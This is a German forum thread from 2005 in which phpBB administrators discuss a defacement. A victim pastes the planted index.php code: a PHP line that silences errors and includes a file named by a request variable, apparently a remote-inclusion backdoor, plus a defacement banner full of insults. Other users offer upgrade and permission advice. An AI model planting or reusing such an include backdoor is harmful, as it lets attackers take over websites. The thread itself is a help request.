Neuer Virus by sirh0t

Compiler · Beitrag von **Compiler** » 10.12.2005 14:21

<? error_reporting(0);ini_set('max_execution_time',0); include($fuck_eric) ?><title>DEFACED BY UNL0CK</title> FUCK YOU 0X1FE AND ALL PEOPLE IN UR CHANNEL ;) FUCK BOTS, FUCK BOXTALK HOPE ALL U LAMERS GET BUSTED<BR><BR>SOON I OWN U ALL!!!<br><br><center>Credits to sirh0t and phpbb</center>

Das ist der Code und mei nForum bei www.PCmasters.de wurde damit geowned udn die index.php wurde überschriebe nauf dem Root verzeuichnis, also Page auch geowend.

Irgendwelche Patches?

Compiler

hagily · Beitrag von **hagily** » 10.12.2005 14:49

Welche Version hast du von phpbb?
wenn die index.php überschrieben wurde würde ich wieder eine neue aus der Doku runterladen und damit die alte überschreiben.
Schau mal welceh CHMOD die config.php hat

Compiler · Beitrag von **Compiler** » 10.12.2005 14:58

2.0.18

hab die index.php überschrieben udn die wird wieder überschrieben.

habe phpBB seit 2 Jahrne udn es kam nur einaml ein error wegen altem Virus.

Welche Rechte muss die config haben?

Compiler

hagily · Beitrag von **hagily** » 10.12.2005 15:00

http://www.phpbb.de/doku/kb/artikel.php ... ight=chmod

Berti · Beitrag von **Berti** » 10.12.2005 15:39

Hallo Compiler,

wir betreiben die 2.0.4 Version vom phpbb. Genau heute (12.10.2005 um 14 Uhr 47) wurde unsere index.php Datei durch die von Dir beschriebene Datei ersetzt. Immer wenn ich sie lösche und durch die original Datei ersetze, wird sie beim ersten Aufruf wieder neu erstellt.

Bedeutet dass, das andere Dateien vom Forum verändert wurden?

Bitte schreibe hier, wenn Du eine Lösung gefunden hast.

Gruß
Berti

hagily · Beitrag von **hagily** » 10.12.2005 15:45

Berti hat geschrieben: wir betreiben die 2.0.4 Version vom phpbb.

Oh mein gott. Also nun nochmal

Bitte installiere dir 2.0.18. Diese Version ist relativ save vor angriffen.
Dann kann euch nichts mehr in passieren

Berti · Beitrag von **Berti** » 10.12.2005 15:55

Hallo hagily,

wenn ich Compiler richtig verstanden habe, hat er die Version 2.0.18 im Einsatz und wurde wohl genauso gehackt wie unser Forum.

Kann ich ohne weiteres das gehackte Forum auf 2.0.18 Updaten?

Gruß
Berti

hagily · Beitrag von **hagily** » 10.12.2005 16:17

wenn du keine Mods installiert hast würde ich ein Mysql-Datenbankbackup machen und .0.18 installieren. danach wieder das backup aufspielen.

Zusätliche hilfen in der KB
Mein Forum wurde gehackt was nun?
http://www.phpbb.de/doku/phpbb-update.php

Berti · Beitrag von **Berti** » 10.12.2005 16:47

Danke hagily!

Ich habe die Version 2.0.18 installiert. Bis jetzt bleibt die index.php stabil.

Beim Ausführen des Updates, wurde zwar ein Error gemeldet:

...in SQL syntax near phpbb_banlist, phpbb_categories, ... at line 1
SQL :: OPTIMIZE TABLE phpbb_auth_access, phpbb_banlist, ...

Ich hoffe das Versagen dieses SQL-Befehls ist nicht schlimm.

Gruß
Robert

Compiler · Beitrag von **Compiler** » 10.12.2005 17:09

Ich habe die 2.0.18 und der shcie kam trotzdem.

Also gibts kine vernünftige Antwort auf den Virus?

mfG
Compiler